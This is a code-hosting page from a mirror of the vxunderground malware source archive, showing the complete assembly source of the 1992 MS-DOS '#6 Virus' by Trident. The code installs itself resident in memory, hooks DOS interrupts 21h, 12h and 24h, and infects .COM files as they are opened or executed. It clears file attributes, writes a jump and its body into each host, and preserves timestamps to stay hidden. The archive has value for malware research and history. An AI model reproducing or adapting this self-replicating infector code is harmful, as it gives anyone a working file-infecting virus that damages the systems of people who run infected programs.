Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-25 00:18:34 +00:00
Code Releases Activity
main
vxug-MalwareSourceCode/MSDOS/N-Index/Virus.MSDOS.Unknown.number-6.asm
vxunderground 4b9382ddbc re-organize 
push
2022-08-21 04:07:57 -05:00

326 lines
6.3 KiB
NASM
Raw Permalink Blame History

;*****************************************************************************
; #6 Virus *
; *
; Assembled with Tasm 2.5 *
; (c) 1992 Trident/Dark Helmet, The Netherlands *
; *
; The author(s) take(s) no responsibility for any damaged caused by *
; this virus. *
;*****************************************************************************
.RADIX 16
virus SEGMENT
MODEL SMALL
ASSUME cs:virus, ds:virus, es:virus
ORG 100h
len EQU OFFSET last - begin
dummy: DB 0e9h,02h,00h,86h,54h ; Jump to start of
; viruscode.
begin: CALL start ; make a call to
; push the IP on the
; stack.
start: POP bp ; get the IP of the
; stack.
SUB bp,108h ; adjust BP (=IP)
; for offset of DATA.
restore: MOV di,0100h ; copy the original
LEA si,ds:[carrier_begin+bp] ; host begin code back.
MOV cx,05h
REP MOVSB
check: MOV ah,0a0h ; check if virus
INT 21h ; allready resident.
CMP ax,8654h
JE end_virus
memory: MOV ax,cs ; DS = Memory Control
DEC ax ; Blok (MCB).
MOV ds,ax
CMP BYTE PTR ds:[0000],5ah ; check first byte if
JNE abort ; last MCB.
MOV ax,ds:[0003] ; decrease memory size.
SUB ax,40
MOV ds:[0003],AX
PUSH cs ; restore ds.
POP ds
install: MOV bx,ax ; ES point where
MOV ax,es ; to copy virus in
ADD ax,bx ; memory.
MOV es,ax
MOV cx,len ; copy virus to
LEA si,ds:[begin+bp] ; memory.
LEA di,es:0105 ; offset = 105
REP MOVSB
MOV [virus_segment+bp],es ; store virus_segment
PUSH cs ; restore es
POP es
hook_vectors: CLI
MOV ax,3521h ; hook int 21h
INT 21h
MOV ds,[virus_segment+bp]
MOV old_21h,bx
MOV old_21h+2,es
MOV dx,offset main_virus
MOV ax,2521h
INT 21h
MOV ax,3512h ; hook int 12h
INT 21h
MOV old_12h,bx
MOV old_12h+2,es
MOV dx,offset new_12h
MOV ax,2512h
INT 21h
STI
abort: MOV ax,cs ; restore ds,es
MOV ds,ax
MOV es,ax
end_virus: MOV bx,0100h ; jump to begin host
PUSH bx
XOR bx,bx
XOR bp,bp
XOR ax,ax
XOR cx,cx
RET
;*****************************************************************************
; *
; This part will intercept the interuptvectors and copy itself to *
; other host programs *
; *
;*****************************************************************************
main_virus: PUSHF
CMP ah,0a0h ; check if virus calls
JNE new_21h ; and return id.
MOV ax,8654h
POPF
IRET
new_21h: PUSH ds ; new interupt 21
PUSH es ; routine
PUSH di
PUSH si
PUSH ax
PUSH bx
PUSH cx
PUSH dx
PUSH sp
PUSH bp
check_open: CMP ah,3dh ; check if a file is
JNE check_exec ; being opened
JMP chk_com
check_exec: CMP ax,04b00h ; check if a file is
JNE continu ; executed
JMP chk_com
continu: POP bp
POP sp
POP dx ; continu with
POP cx ; interrupt
POP bx
POP ax
POP si
POP di
POP es
POP ds
POPF
JMP DWORD PTR cs:[old_21h]
chk_com: MOV cs:[name_seg],ds
MOV cs:[name_off],dx
CLD ; check if extension
MOV di,dx ; is COM file
PUSH ds
POP es
MOV al,'.'
REPNE SCASB
CMP WORD PTR es:[di],'OC'
JNE continu
CMP WORD PTR es:[di+2],'M'
JNE continu
CMP WORD PTR es:[di-7],'MO' ; Check for
JNE error ; COMMAND.COM
CMP WORD PTR es:[di-5],'AM'
JNE error
CMP WORD PTR es:[di-3],'DN'
JE continu
error: CALL int24h ; take care of error
; messages
CALL set_atribute ; set atribute for
; writing
open_file: MOV ds,cs:[name_seg] ; open file
MOV dx,cs:[name_off]
MOV ax,3d02h
CALL do_int21h
JC close_file
PUSH cs
POP ds
MOV [handle],ax
MOV bx,ax
CALL get_date
check_infect: PUSH CS ; check if file
POP DS ; already infect
MOV BX,[handle]
MOV ah,3fh
MOV cx,05h
LEA dx,[carrier_begin]
CALL do_int21h
MOV al, BYTE PTR [carrier_begin]+3 ; look for
MOV ah, BYTE PTR [carrier_begin]+4 ; identification byte's
CMP ax,[initials]
JE save_date
get_lenght: MOV ax,4200h
CALL move_pointer
MOV ax,4202h
CALL move_pointer
SUB AX,03h
MOV [lenght_file],ax
CALL write_jmp ; write jump
; instruction.
CALL write_virus ; write virus
; body.
save_date: PUSH CS
POP DS
MOV bx,[handle]
MOV dx,[date]
MOV cx,[time]
MOV ax,5701h
CALL do_int21h
close_file: MOV bx,[handle] ; close file
MOV ah,3eh
CALL do_int21h
restore_int24h: MOV dx,cs:[old_24h] ; restore int24
MOV ds,cs:[old_24h+2] ; for critical
MOV ax,2524h ; error handling
CALL do_int21h
JMP continu
new_24h: MOV al,3
IRET
new_12h: JMP DWORD PTR cs:[old_12h]
SUB ax,50
IRET
;*****************************************************************************
move_pointer: PUSH cs
POP ds
MOV bx,[handle]
XOR cx,cx
XOR dx,dx
CALL do_int21h
RET
do_int21h: PUSHF
CALL DWORD PTR cs:[old_21h]
RET
write_jmp: PUSH CS
POP DS
MOV ax,4200h ; write jump
CALL move_pointer ; instruction
MOV ah,40h
MOV cx,01h
LEA dx,[jump]
CALL do_int21h
MOV ah,40h ; write offset of
MOV cx,02h ; jump
LEA dx,[lenght_file]
CALL do_int21h
MOV ah,40h ; write mark for
MOV cx,02h ; infection
LEA dx,[initials]
CALL do_int21h
RET
write_virus: PUSH CS
POP DS
MOV ax,4202h ; write main
CALL move_pointer ; virus body
MOV ah,40 ; at end of
MOV cx,len ; program
MOV dx,105h
CALL do_int21h
RET
get_date: MOV ax,5700h
CALL do_int21h
PUSH cs
POP ds
MOV [date],dx
MOV [time],cx
RET
int24h: MOV ax,3524h
CALL do_int21h
MOV cs:[old_24h],bx
MOV cs:[old_24h+2],es
MOV dx,offset new_24h
PUSH CS
POP DS
MOV AX,2524h
CALL do_int21h
RET
set_atribute: MOV ax,4300h ; get atribute
MOV ds,cs:[name_seg]
MOV dx,cs:[name_off]
CALL do_int21h
AND cl,0feh ; set atribute
MOV ax,4301h
CALL do_int21h
RET
;*****************************************************************************
text db '#6 Virus, Trident/The Netherlands 1992'
old_12h dw 00h,00h
old_21h dw 00h,00h
old_24h dw 00h,00h
carrier_begin db 090h,0cdh,020h,086h,054h
jump db 0e9h
name_seg dw ?
name_off dw ?
virus_segment dw ?
handle dw ?
lenght_file dw ?
date dw ?
time dw ?
initials dw 5486h
last db 090h
virus ends
end dummy
View Git Blame Copy Permalink